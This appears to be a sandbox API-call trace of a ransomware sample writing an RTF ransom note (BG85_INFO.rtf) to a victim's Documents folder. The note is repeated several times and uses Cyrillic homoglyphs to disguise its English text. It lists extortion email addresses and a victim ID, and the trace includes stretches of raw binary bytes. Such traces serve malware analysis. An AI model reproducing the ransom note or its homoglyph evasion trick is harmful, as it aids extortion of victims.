r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¤#9#,&«\x1e­\x8c…?4kP@<õL\x88f#Öã\x9b\x1d\x8e\x8c¥Ù\x09,Z/µ×jd0\x88\x9d]8ÏgNFâ.Ä4ìïÎ1ð£\x0bkzsµ³[÷\x96\x1d\x0eÖ\x97\x8d\x07q?G\x16~\x03\x13\x88ª#C6ôaK=\x96\x0f%ǨæúpW¼\x88²pµ´ò{Îî(sÛ\x1cC\x01þáý\x9aYf}\x1e\x13£1/ø¡r$oÛ\x03Û/¤ê\x83\x0b{¸zu\x9c%2±VX*P\x1dZ\x95´Ñ-\x835\x8c\x8a¶ \"èÃÐì'\n\x91\x9ee<\rÜ.ß0©Ö\x18ù\x1b!o\x8aͶ\x1a\x1cnô\x04\x80´*+¯~ÐJ9*à²9+|¨ð\x1eò\x98Ó\x0b", lpUsedDefaultChar=0x0) returned 7247 [0067.825] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0067.826] CloseHandle (hObject=0x1dc) returned 1 [0067.826] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\bg85_info.rtf")) returned 0xffffffff [0067.826] GetLastError () returned 0x2 [0067.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd 